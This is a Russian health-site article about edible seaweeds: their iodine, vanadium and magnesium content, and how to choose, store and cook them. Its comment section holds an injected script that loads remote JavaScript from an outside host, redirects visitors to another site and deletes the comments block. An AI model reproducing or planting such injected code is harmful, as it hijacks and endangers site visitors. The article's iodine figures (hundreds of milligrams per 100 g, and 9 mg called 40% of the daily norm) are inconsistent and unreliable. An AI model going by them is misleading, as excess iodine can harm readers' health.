Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Морской огород  >>  Морской огород
 
Обратная связь
 

Морской огород

Размер шрифта
09 апреля 2012 09:50
  • google_analytics: false
  • Нравится

Теперь любые водоросли, а не только морскую капусту, можно свободно купить почти везде. Что следует о них знать и как их следует готовить?

Существует более 30 разновидностей морских водорослей, которые используются в пищу. Большинство водорослей в прибрежной зоне используется в сельском хозяйстве: для удобрений или в качестве корма скота. Для человека открыто множество полезных свойств этих растений.

Водоросли – абсолютные лидеры по количеству йода среди всех продуктов питания. Йод необходим для нормальной работы щитовидной железы. Два гормона щитовидной железы вообще не синтезируются без этого микроэлемента.

Существует элемент, который мы получаем только с морской растительностью – ванадий. Ванадий улучшает усвояемость сахара и снижает уровень сахара крови.

В водорослях большое количество магния. Магний повышает всасывание кальция в кровь и влияет на выработку гормона кальцитонина, который помогает формированию прочной костной ткани.

Сами по себе, водоросли – низкокалорийный продукт. В них есть даже жирные кислоты, причем – полиненасыщенные жирные кислоты, как и во многих морепродуктах.

Водоросли нори продаются в прессованном высушенном виде. Их продают для приготовления суши.

Чука салат (вакаме)обладает листьями длиной до 1-1,5 м.

Водоросли комбу именуются у нас морской капустой (ламинария).

Пьедестал по содержанию йода:

1-е место: вакаме (чука) – 730 мг на 100 г
2-е место: комбу (ламинария) – 290 мг на 100 г
3-е место: нори – 9 мг на 100 г продукта (40 % от суточной нормы!)

В связи с высоким содержанием йода в морских водорослях следует помнить об умеренности и о том, что избыток йода также недопустим, как и его дефицит. Гормоны щитовидной железы регулируют активность обменных процессов. Если дефицит йода возникает у беременной женщины, будущий ребенок может иметь отставание в умственном развитии.

Как выбрать

В России обычно продаются сухие водоросли. Белесый налет на комбу не является плохим признаком, это – свидетельство правильной сушки. Его можно просто протереть. При покупке японских водорослей на упаковке ищите русскую этикетку с переводом. Нори должны быть темно-зеленые или черные. Вакаме иногда продается в виде порошка в банках. Чипсы из вакаме употреблять не стоит из-за соли.

Как хранить

Водоросли хранят в прохладном сухом месте, но не в холодильнике. После приготовления водоросли не должны подвергаться воздействию прямых солнечных лучей. Доступ большого количества воздуха приводит к пересыханию продукта. При соблюдении условий сухие водоросли могут храниться до полугода. Порошковые водоросли могут храниться еще больше.

Как приготовить

Все водоросли размачиваются. Они используются для приготовления бульонов и супов. Размоченные листья также добавляются в салаты. И, разумеется, водоросли применяют для создания в домашних условиях роллов.

К сведению: продолжительность жизни в Японии, где водоросли входят в ежедневный рацион питания - одна из самых больших в мире.

Сюжеты по теме:
Водоросли: как выбрать и как приготовить

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:45

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Слайдшоу

Какие водоросли надо съесть    
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.